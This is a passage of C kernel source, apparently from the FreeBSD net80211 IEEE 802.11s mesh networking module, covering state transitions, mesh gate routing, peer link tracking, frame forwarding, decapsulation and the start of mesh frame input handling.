IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; case IEEE80211_S_CAC: ieee80211_dfs_cac_stop(vap); break; case IEEE80211_S_RUN: ieee80211_iterate_nodes(&ic->ic_sta, mesh_vdetach_peers, NULL); break; default: break; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); ieee80211_mesh_rt_flush(vap); } break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_INIT: if (vap->iv_des_chan != IEEE80211_CHAN_ANYC && !IEEE80211_IS_CHAN_RADAR(vap->iv_des_chan) && ms->ms_idlen != 0) { /* * Already have a channel and a mesh ID; bypass * the scan and startup immediately. */ ieee80211_create_ibss(vap, vap->iv_des_chan); break; } /* * Initiate a scan. We can come here as a result * of an IEEE80211_IOC_SCAN_REQ too in which case * the vap will be marked with IEEE80211_FEXT_SCANREQ * and the scan request parameters will be present * in iv_scanreq. Otherwise we do the default. */ if (vap->iv_flags_ext & IEEE80211_FEXT_SCANREQ) { ieee80211_check_scan(vap, vap->iv_scanreq_flags, vap->iv_scanreq_duration, vap->iv_scanreq_mindwell, vap->iv_scanreq_maxdwell, vap->iv_scanreq_nssid, vap->iv_scanreq_ssid); vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANREQ; } else ieee80211_check_scan_current(vap); break; default: break; } break; case IEEE80211_S_CAC: /* * Start CAC on a DFS channel. We come here when starting * a bss on a DFS channel (see ieee80211_create_ibss). */ ieee80211_dfs_cac_start(vap); break; case IEEE80211_S_RUN: switch (ostate) { case IEEE80211_S_INIT: /* * Already have a channel; bypass the * scan and startup immediately. * Note that ieee80211_create_ibss will call * back to do a RUN->RUN state change. */ ieee80211_create_ibss(vap, ieee80211_ht_adjust_channel(ic, ic->ic_curchan, vap->iv_flags_ht)); /* NB: iv_bss is changed on return */ break; case IEEE80211_S_CAC: /* * NB: This is the normal state change when CAC * expires and no radar was detected; no need to * clear the CAC timer as it's already expired. */ /* fall thru... */ case IEEE80211_S_CSA: #if 0 /* * Shorten inactivity timer of associated stations * to weed out sta's that don't follow a CSA. */ ieee80211_iterate_nodes(&ic->ic_sta, sta_csa, vap); #endif /* * Update bss node channel to reflect where * we landed after CSA. */ ieee80211_node_set_chan(vap->iv_bss, ieee80211_ht_adjust_channel(ic, ic->ic_curchan, ieee80211_htchanflags(vap->iv_bss->ni_chan))); /* XXX bypass debug msgs */ break; case IEEE80211_S_SCAN: case IEEE80211_S_RUN: #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap)) { struct ieee80211_node *ni = vap->iv_bss; ieee80211_note(vap, "synchronized with %s meshid ", ether_sprintf(ni->ni_meshid)); ieee80211_print_essid(ni->ni_meshid, ni->ni_meshidlen); /* XXX MCS/HT */ printf(" channel %d\n", ieee80211_chan2ieee(ic, ic->ic_curchan)); } #endif break; default: break; } ieee80211_node_authorize(vap->iv_bss); callout_reset(&ms->ms_cleantimer, ms->ms_ppath->mpp_inact, mesh_rt_cleanup_cb, vap); mesh_gatemode_setup(vap); break; default: break; } /* NB: ostate not nstate */ ms->ms_ppath->mpp_newstate(vap, ostate, arg); return 0; } static void mesh_rt_cleanup_cb(void *arg) { struct ieee80211vap *vap = arg; struct ieee80211_mesh_state *ms = vap->iv_mesh; mesh_rt_flush_invalid(vap); callout_reset(&ms->ms_cleantimer, ms->ms_ppath->mpp_inact, mesh_rt_cleanup_cb, vap); } /* * Mark a mesh STA as gate and return a pointer to it. * If this is first time, we create a new gate route. * Always update the path route to this mesh gate. */ struct ieee80211_mesh_gate_route * ieee80211_mesh_mark_gate(struct ieee80211vap *vap, const uint8_t *addr, struct ieee80211_mesh_route *rt) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_gate_route *gr = NULL, *next; int found = 0; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(gr, &ms->ms_known_gates, gr_next, next) { if (IEEE80211_ADDR_EQ(gr->gr_addr, addr)) { found = 1; break; } } if (!found) { /* New mesh gate add it to known table. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, addr, "%s", "stored new gate information from pro-PREQ."); gr = malloc(ALIGN(sizeof(struct ieee80211_mesh_gate_route)), M_80211_MESH_GT_RT, M_NOWAIT | M_ZERO); IEEE80211_ADDR_COPY(gr->gr_addr, addr); TAILQ_INSERT_TAIL(&ms->ms_known_gates, gr, gr_next); } gr->gr_route = rt; /* TODO: link from path route to gate route */ MESH_RT_UNLOCK(ms); return gr; } /* * Helper function to note the Mesh Peer Link FSM change. */ static void mesh_linkchange(struct ieee80211_node *ni, enum ieee80211_mesh_mlstate state) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; #ifdef IEEE80211_DEBUG static const char *meshlinkstates[] = { [IEEE80211_NODE_MESH_IDLE] = "IDLE", [IEEE80211_NODE_MESH_OPENSNT] = "OPEN SENT", [IEEE80211_NODE_MESH_OPENRCV] = "OPEN RECEIVED", [IEEE80211_NODE_MESH_CONFIRMRCV] = "CONFIRM RECEIVED", [IEEE80211_NODE_MESH_ESTABLISHED] = "ESTABLISHED", [IEEE80211_NODE_MESH_HOLDING] = "HOLDING" }; #endif IEEE80211_NOTE(vap, IEEE80211_MSG_MESH, ni, "peer link: %s -> %s", meshlinkstates[ni->ni_mlstate], meshlinkstates[state]); /* track neighbor count */ if (state == IEEE80211_NODE_MESH_ESTABLISHED && ni->ni_mlstate != IEEE80211_NODE_MESH_ESTABLISHED) { KASSERT(ms->ms_neighbors < 65535, ("neighbor count overflow")); ms->ms_neighbors++; ieee80211_beacon_notify(vap, IEEE80211_BEACON_MESHCONF); } else if (ni->ni_mlstate == IEEE80211_NODE_MESH_ESTABLISHED && state != IEEE80211_NODE_MESH_ESTABLISHED) { KASSERT(ms->ms_neighbors > 0, ("neighbor count 0")); ms->ms_neighbors--; ieee80211_beacon_notify(vap, IEEE80211_BEACON_MESHCONF); } ni->ni_mlstate = state; switch (state) { case IEEE80211_NODE_MESH_HOLDING: ms->ms_ppath->mpp_peerdown(ni); break; case IEEE80211_NODE_MESH_ESTABLISHED: ieee80211_mesh_discover(vap, ni->ni_macaddr, NULL); break; default: break; } } /* * Helper function to generate a unique local ID required for mesh * peer establishment. */ static void mesh_checkid(void *arg, struct ieee80211_node *ni) { uint16_t *r = arg; if (*r == ni->ni_mllid) *(uint16_t *)arg = 0; } static uint32_t mesh_generateid(struct ieee80211vap *vap) { int maxiter = 4; uint16_t r; do { get_random_bytes(&r, 2); ieee80211_iterate_nodes(&vap->iv_ic->ic_sta, mesh_checkid, &r); maxiter--; } while (r == 0 && maxiter > 0); return r; } /* * Verifies if we already received this packet by checking its * sequence number. * Returns 0 if the frame is to be accepted, 1 otherwise. */ static int mesh_checkpseq(struct ieee80211vap *vap, const uint8_t source[IEEE80211_ADDR_LEN], uint32_t seq) { struct ieee80211_mesh_route *rt; rt = ieee80211_mesh_rt_find(vap, source); if (rt == NULL) { rt = ieee80211_mesh_rt_add(vap, source); if (rt == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, source, "%s", "add mcast route failed"); vap->iv_stats.is_mesh_rtaddfailed++; return 1; } IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, source, "add mcast route, mesh seqno %d", seq); rt->rt_lastmseq = seq; return 0; } if (IEEE80211_MESH_SEQ_GEQ(rt->rt_lastmseq, seq)) { return 1; } else { rt->rt_lastmseq = seq; return 0; } } /* * Iterate the routing table and locate the next hop. */ struct ieee80211_node * ieee80211_mesh_find_txnode(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_route *rt; rt = ieee80211_mesh_rt_find(vap, dest); if (rt == NULL) return NULL; if ((rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s: !valid, flags 0x%x", __func__, rt->rt_flags); /* XXX stat */ return NULL; } if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) { rt = ieee80211_mesh_rt_find(vap, rt->rt_mesh_gate); if (rt == NULL) return NULL; if ((rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s: meshgate !valid, flags 0x%x", __func__, rt->rt_flags); /* XXX stat */ return NULL; } } return ieee80211_find_txnode(vap, rt->rt_nexthop); } static void mesh_transmit_to_gate(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_mesh_route *rt_gate) { struct ifnet *ifp = vap->iv_ifp; struct ieee80211_node *ni; IEEE80211_TX_UNLOCK_ASSERT(vap->iv_ic); ni = ieee80211_mesh_find_txnode(vap, rt_gate->rt_dest); if (ni == NULL) { ifp->if_oerrors++; m_freem(m); return; } /* * Send through the VAP packet transmit path. * This consumes the node ref grabbed above and * the mbuf, regardless of whether there's a problem * or not. */ (void) ieee80211_vap_pkt_send_dest(vap, m, ni); } /* * Forward the queued frames to known valid mesh gates. * Assume destination to be outside the MBSS (i.e. proxy entry), * If no valid mesh gates are known silently discard queued frames. * After transmitting frames to all known valid mesh gates, this route * will be marked invalid, and a new path discovery will happen in the hopes * that (at least) one of the mesh gates have a new proxy entry for us to use. */ void ieee80211_mesh_forward_to_gates(struct ieee80211vap *vap, struct ieee80211_mesh_route *rt_dest) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt_gate; struct ieee80211_mesh_gate_route *gr = NULL, *gr_next; struct mbuf *m, *mcopy, *next; IEEE80211_TX_UNLOCK_ASSERT(ic); KASSERT( rt_dest->rt_flags == IEEE80211_MESHRT_FLAGS_DISCOVER, ("Route is not marked with IEEE80211_MESHRT_FLAGS_DISCOVER")); /* XXX: send to more than one valid mash gate */ MESH_RT_LOCK(ms); m = ieee80211_ageq_remove(&ic->ic_stageq, (struct ieee80211_node *)(uintptr_t) ieee80211_mac_hash(ic, rt_dest->rt_dest)); TAILQ_FOREACH_SAFE(gr, &ms->ms_known_gates, gr_next, gr_next) { rt_gate = gr->gr_route; if (rt_gate == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_HWMP, rt_dest->rt_dest, "mesh gate with no path %6D", gr->gr_addr, ":"); continue; } if ((rt_gate->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) continue; KASSERT(rt_gate->rt_flags & IEEE80211_MESHRT_FLAGS_GATE, ("route not marked as a mesh gate")); KASSERT((rt_gate->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) == 0, ("found mesh gate that is also marked porxy")); /* * convert route to a proxy route gated by the current * mesh gate, this is needed so encap can built data * frame with correct address. */ rt_dest->rt_flags = IEEE80211_MESHRT_FLAGS_PROXY | IEEE80211_MESHRT_FLAGS_VALID; rt_dest->rt_ext_seq = 1; /* random value */ IEEE80211_ADDR_COPY(rt_dest->rt_mesh_gate, rt_gate->rt_dest); IEEE80211_ADDR_COPY(rt_dest->rt_nexthop, rt_gate->rt_nexthop); rt_dest->rt_metric = rt_gate->rt_metric; rt_dest->rt_nhops = rt_gate->rt_nhops; ieee80211_mesh_rt_update(rt_dest, ms->ms_ppath->mpp_inact); MESH_RT_UNLOCK(ms); /* XXX: lock?? */ mcopy = m_dup(m, M_NOWAIT); for (; mcopy != NULL; mcopy = next) { next = mcopy->m_nextpkt; mcopy->m_nextpkt = NULL; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_HWMP, rt_dest->rt_dest, "flush queued frame %p len %d", mcopy, mcopy->m_pkthdr.len); mesh_transmit_to_gate(vap, mcopy, rt_gate); } MESH_RT_LOCK(ms); } rt_dest->rt_flags = 0; /* Mark invalid */ m_freem(m); MESH_RT_UNLOCK(ms); } /* * Forward the specified frame. * Decrement the TTL and set TA to our MAC address. */ static void mesh_forward(struct ieee80211vap *vap, struct mbuf *m, const struct ieee80211_meshcntl *mc) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ifnet *ifp = vap->iv_ifp; const struct ieee80211_frame *wh = mtod(m, const struct ieee80211_frame *); struct mbuf *mcopy; struct ieee80211_meshcntl *mccopy; struct ieee80211_frame *whcopy; struct ieee80211_node *ni; int err; /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(ic); /* * mesh ttl of 1 means we are the last one receving it, * according to amendment we decrement and then check if * 0, if so we dont forward. */ if (mc->mc_ttl < 1) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, ttl 1"); vap->iv_stats.is_mesh_fwd_ttl++; return; } if (!(ms->ms_flags & IEEE80211_MESHFLAGS_FWD)) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, fwding disabled"); vap->iv_stats.is_mesh_fwd_disabled++; return; } mcopy = m_dup(m, M_NOWAIT); if (mcopy == NULL) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, cannot dup"); vap->iv_stats.is_mesh_fwd_nobuf++; ifp->if_oerrors++; return; } mcopy = m_pullup(mcopy, ieee80211_hdrspace(ic, wh) + sizeof(struct ieee80211_meshcntl)); if (mcopy == NULL) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, too short"); vap->iv_stats.is_mesh_fwd_tooshort++; ifp->if_oerrors++; m_freem(mcopy); return; } whcopy = mtod(mcopy, struct ieee80211_frame *); mccopy = (struct ieee80211_meshcntl *) (mtod(mcopy, uint8_t *) + ieee80211_hdrspace(ic, wh)); /* XXX clear other bits? */ whcopy->i_fc[1] &= ~IEEE80211_FC1_RETRY; IEEE80211_ADDR_COPY(whcopy->i_addr2, vap->iv_myaddr); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { ni = ieee80211_ref_node(vap->iv_bss); mcopy->m_flags |= M_MCAST; } else { ni = ieee80211_mesh_find_txnode(vap, whcopy->i_addr3); if (ni == NULL) { /* * [Optional] any of the following three actions: * o silently discard * o trigger a path discovery * o inform TA that meshDA is unknown. */ IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_MESH, wh, "%s", "frame not fwd'd, no path"); ms->ms_ppath->mpp_senderror(vap, whcopy->i_addr3, NULL, IEEE80211_REASON_MESH_PERR_NO_FI); vap->iv_stats.is_mesh_fwd_nopath++; m_freem(mcopy); return; } IEEE80211_ADDR_COPY(whcopy->i_addr1, ni->ni_macaddr); } KASSERT(mccopy->mc_ttl > 0, ("%s called with wrong ttl", __func__)); mccopy->mc_ttl--; /* XXX calculate priority so drivers can find the tx queue */ M_WME_SETAC(mcopy, WME_AC_BE); /* XXX do we know m_nextpkt is NULL? */ mcopy->m_pkthdr.rcvif = (void *) ni; /* * XXX this bypasses all of the VAP TX handling; it passes frames * directly to the parent interface. * * Because of this, there's no TX lock being held as there's no * encaps state being used. * * Doing a direct parent transmit may not be the correct thing * to do here; we'll have to re-think this soon. */ IEEE80211_TX_LOCK(ic); err = ieee80211_parent_xmitpkt(ic, mcopy); IEEE80211_TX_UNLOCK(ic); if (err != 0) { /* NB: IFQ_HANDOFF reclaims mbuf */ ieee80211_free_node(ni); } else { ifp->if_opackets++; } } static struct mbuf * mesh_decap(struct ieee80211vap *vap, struct mbuf *m, int hdrlen, int meshdrlen) { #define WHDIR(wh) ((wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) #define MC01(mc) ((const struct ieee80211_meshcntl_ae01 *)mc) uint8_t b[sizeof(struct ieee80211_qosframe_addr4) + sizeof(struct ieee80211_meshcntl_ae10)]; const struct ieee80211_qosframe_addr4 *wh; const struct ieee80211_meshcntl_ae10 *mc; struct ether_header *eh; struct llc *llc; int ae; if (m->m_len < hdrlen + sizeof(*llc) && (m = m_pullup(m, hdrlen + sizeof(*llc))) == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_ANY, "discard data frame: %s", "m_pullup failed"); vap->iv_stats.is_rx_tooshort++; return NULL; } memcpy(b, mtod(m, caddr_t), hdrlen); wh = (const struct ieee80211_qosframe_addr4 *)&b[0]; mc = (const struct ieee80211_meshcntl_ae10 *)&b[hdrlen - meshdrlen]; KASSERT(WHDIR(wh) == IEEE80211_FC1_DIR_FROMDS || WHDIR(wh) == IEEE80211_FC1_DIR_DSTODS, ("bogus dir, fc 0x%x:0x%x", wh->i_fc[0], wh->i_fc[1])); llc = (struct llc *)(mtod(m, caddr_t) + hdrlen); if (llc->llc_dsap == LLC_SNAP_LSAP && llc->llc_ssap == LLC_SNAP_LSAP && llc->llc_control == LLC_UI && llc->llc_snap.org_code[0] == 0 && llc->llc_snap.org_code[1] == 0 && llc->llc_snap.org_code[2] == 0 && /* NB: preserve AppleTalk frames that have a native SNAP hdr */ !(llc->llc_snap.ether_type == htons(ETHERTYPE_AARP) || llc->llc_snap.ether_type == htons(ETHERTYPE_IPX))) { m_adj(m, hdrlen + sizeof(struct llc) - sizeof(*eh)); llc = NULL; } else { m_adj(m, hdrlen - sizeof(*eh)); } eh = mtod(m, struct ether_header *); ae = mc->mc_flags & IEEE80211_MESH_AE_MASK; if (WHDIR(wh) == IEEE80211_FC1_DIR_FROMDS) { IEEE80211_ADDR_COPY(eh->ether_dhost, wh->i_addr1); if (ae == IEEE80211_MESH_AE_00) { IEEE80211_ADDR_COPY(eh->ether_shost, wh->i_addr3); } else if (ae == IEEE80211_MESH_AE_01) { IEEE80211_ADDR_COPY(eh->ether_shost, MC01(mc)->mc_addr4); } else { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, (const struct ieee80211_frame *)wh, NULL, "bad AE %d", ae); vap->iv_stats.is_mesh_badae++; m_freem(m); return NULL; } } else { if (ae == IEEE80211_MESH_AE_00) { IEEE80211_ADDR_COPY(eh->ether_dhost, wh->i_addr3); IEEE80211_ADDR_COPY(eh->ether_shost, wh->i_addr4); } else if (ae == IEEE80211_MESH_AE_10) { IEEE80211_ADDR_COPY(eh->ether_dhost, mc->mc_addr5); IEEE80211_ADDR_COPY(eh->ether_shost, mc->mc_addr6); } else { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, (const struct ieee80211_frame *)wh, NULL, "bad AE %d", ae); vap->iv_stats.is_mesh_badae++; m_freem(m); return NULL; } } #ifndef __NO_STRICT_ALIGNMENT if (!ALIGNED_POINTER(mtod(m, caddr_t) + sizeof(*eh), uint32_t)) { m = ieee80211_realign(vap, m, sizeof(*eh)); if (m == NULL) return NULL; } #endif /* !__NO_STRICT_ALIGNMENT */ if (llc != NULL) { eh = mtod(m, struct ether_header *); eh->ether_type = htons(m->m_pkthdr.len - sizeof(*eh)); } return m; #undef WDIR #undef MC01 } /* * Return non-zero if the unicast mesh data frame should be processed * locally. Frames that are not proxy'd have our address, otherwise * we need to consult the routing table to look for a proxy entry. */ static __inline int mesh_isucastforme(struct ieee80211vap *vap, const struct ieee80211_frame *wh, const struct ieee80211_meshcntl *mc) { int ae = mc->mc_flags & 3; KASSERT((wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS, ("bad dir 0x%x:0x%x", wh->i_fc[0], wh->i_fc[1])); KASSERT(ae == IEEE80211_MESH_AE_00 || ae == IEEE80211_MESH_AE_10, ("bad AE %d", ae)); if (ae == IEEE80211_MESH_AE_10) { /* ucast w/ proxy */ const struct ieee80211_meshcntl_ae10 *mc10 = (const struct ieee80211_meshcntl_ae10 *) mc; struct ieee80211_mesh_route *rt = ieee80211_mesh_rt_find(vap, mc10->mc_addr5); /* check for proxy route to ourself */ return (rt != NULL && (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY)); } else /* ucast w/o proxy */ return IEEE80211_ADDR_EQ(wh->i_addr3, vap->iv_myaddr); } /* * Verifies transmitter, updates lifetime, precursor list and forwards data. * > 0 means we have forwarded data and no need to process locally * == 0 means we want to process locally (and we may have forwarded data * < 0 means there was an error and data should be discarded */ static int mesh_recv_indiv_data_to_fwrd(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_frame *wh, const struct ieee80211_meshcntl *mc) { struct ieee80211_qosframe_addr4 *qwh; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt_meshda, *rt_meshsa; /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(vap->iv_ic); qwh = (struct ieee80211_qosframe_addr4 *)wh; /* * TODO: * o verify addr2 is a legitimate transmitter * o lifetime of precursor of addr3 (addr2) is max(init, curr) * o lifetime of precursor of addr4 (nexthop) is max(init, curr) */ /* set lifetime of addr3 (meshDA) to initial value */ rt_meshda = ieee80211_mesh_rt_find(vap, qwh->i_addr3); if (rt_meshda == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, qwh->i_addr2, "no route to meshDA(%6D)", qwh->i_addr3, ":"); /* * [Optional] any of the following three actions: * o silently discard [X] * o trigger a path discovery [ ] * o inform TA that meshDA is unknown. [ ] */ /* XXX: stats */ return (-1); } ieee80211_mesh_rt_update(rt_meshda, ticks_to_msecs( ms->ms_ppath->mpp_inact)); /* set lifetime of addr4 (meshSA) to initial value */ rt_meshsa = ieee80211_mesh_rt_find(vap, qwh->i_addr4); KASSERT(rt_meshsa != NULL, ("no route")); ieee80211_mesh_rt_update(rt_meshsa, ticks_to_msecs( ms->ms_ppath->mpp_inact)); mesh_forward(vap, m, mc); return (1); /* dont process locally */ } /* * Verifies transmitter, updates lifetime, precursor list and process data * locally, if data is proxy with AE = 10 it could mean data should go * on another mesh path or data should be forwarded to the DS. * * > 0 means we have forwarded data and no need to process locally * == 0 means we want to process locally (and we may have forwarded data * < 0 means there was an error and data should be discarded */ static int mesh_recv_indiv_data_to_me(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_frame *wh, const struct ieee80211_meshcntl *mc) { struct ieee80211_qosframe_addr4 *qwh; const struct ieee80211_meshcntl_ae10 *mc10; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; int ae; /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(vap->iv_ic); qwh = (struct ieee80211_qosframe_addr4 *)wh; mc10 = (const struct ieee80211_meshcntl_ae10 *)mc; /* * TODO: * o verify addr2 is a legitimate transmitter * o lifetime of precursor entry is max(init, curr) */ /* set lifetime of addr4 (meshSA) to initial value */ rt = ieee80211_mesh_rt_find(vap, qwh->i_addr4); KASSERT(rt != NULL, ("no route")); ieee80211_mesh_rt_update(rt, ticks_to_msecs(ms->ms_ppath->mpp_inact)); rt = NULL; ae = mc10->mc_flags & IEEE80211_MESH_AE_MASK; KASSERT(ae == IEEE80211_MESH_AE_00 || ae == IEEE80211_MESH_AE_10, ("bad AE %d", ae)); if (ae == IEEE80211_MESH_AE_10) { if (IEEE80211_ADDR_EQ(mc10->mc_addr5, qwh->i_addr3)) { return (0); /* process locally */ } rt = ieee80211_mesh_rt_find(vap, mc10->mc_addr5); if (rt != NULL && (rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) && (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) == 0) { /* * Forward on another mesh-path, according to * amendment as specified in 9.32.4.1 */ IEEE80211_ADDR_COPY(qwh->i_addr3, mc10->mc_addr5); mesh_forward(vap, m, (const struct ieee80211_meshcntl *)mc10); return (1); /* dont process locally */ } /* * All other cases: forward of MSDUs from the MBSS to DS indiv. * addressed according to 13.11.3.2. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_OUTPUT, qwh->i_addr2, "forward frame to DS, SA(%6D) DA(%6D)", mc10->mc_addr6, ":", mc10->mc_addr5, ":"); } return (0); /* process locally */ } /* * Try to forward the group addressed data on to other mesh STAs, and * also to the DS. * * > 0 means we have forwarded data and no need to process locally * == 0 means we want to process locally (and we may have forwarded data * < 0 means there was an error and data should be discarded */ static int mesh_recv_group_data(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_frame *wh, const struct ieee80211_meshcntl *mc) { #define MC01(mc) ((const struct ieee80211_meshcntl_ae01 *)mc) struct ieee80211_mesh_state *ms = vap->iv_mesh; /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(vap->iv_ic); mesh_forward(vap, m, mc); if(mc->mc_ttl > 0) { if (mc->mc_flags & IEEE80211_MESH_AE_01) { /* * Forward of MSDUs from the MBSS to DS group addressed * (according to 13.11.3.2) * This happens by delivering the packet, and a bridge * will sent it on another port member. */ if (ms->ms_flags & IEEE80211_MESHFLAGS_GATE && ms->ms_flags & IEEE80211_MESHFLAGS_FWD) IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, MC01(mc)->mc_addr4, "%s", "forward from MBSS to the DS"); } } return (0); /* process locally */ #undef MC01 } static int mesh_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) #define MC01(mc) ((const struct ieee80211_meshcntl_ae01 *)mc) #define MC10(mc) ((const struct ieee80211_meshcntl_ae10 *)mc) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; const struct ieee80211_meshcntl *mc; int hdrspace, meshdrlen, need_tap, error; uint8_t dir, type, subtype, ae; uint32_t seq; const uint8_t *addr; uint8_t qos[2]; ieee80211_seq rxseq; KASSERT(ni != NULL, ("null node")); ni->ni_inact = ni->ni_inact_reload; need_tap = 1; /* mbuf need to be tapped. */ type = -1; /* undefined */ /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(ic); if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version %x", wh->i_fc[0]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr1, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } } #ifdef IEEE80211_DEBUG /* * It's easier, but too expensive, to simulate different mesh * topologies by consulting the ACL policy very early, so do this * only under DEBUG. * * NB: this check is also done upon peering link initiation. */ if (vap->iv_acl != NULL && !vap->iv_acl->iac_check(vap, wh)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ACL, wh, NULL, "%s", "disallowed by ACL"); vap->iv_stats.is_rx_acl++; goto out; } #endif switch (type) { case IEEE80211_FC0_TYPE_DATA: if (ni == vap->iv_bss) goto out; if (ni->ni_mlstate != IEEE80211_NODE_MESH_ESTABLISHED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, NULL, "peer link not yet established (%d)", ni->ni_mlstate); vap->iv_stats.is_mesh_nolink++; goto out; } if (dir != IEEE80211_FC1_DIR_FROMDS && dir != IEEE80211_FC1_DIR_DSTODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } /* All Mesh data frames are QoS subtype */ if (!HAS_SEQ(type)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect subtype 0x%x", subtype); vap->iv_stats.is_rx_badsubtype++; goto err; } /* * Next up, any fragmentation. * XXX: we defrag before we even try to forward, * Mesh Control field is not present in sub-sequent * fragmented frames. This is in contrast to Draft 4.0. */ hdrspace = ieee80211_hdrspace(ic, wh); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = mtod(m, struct ieee80211_frame *); /* NB: after defrag */ /* * Now we have a complete Mesh Data frame. */ /* * Only fromDStoDS data frames use 4 address qos frames * as specified in amendment. Otherwise addr4 is located * in the Mesh Control field and a 3 address qos frame * is used. */ if (IEEE80211_IS_DSTODS(wh)) 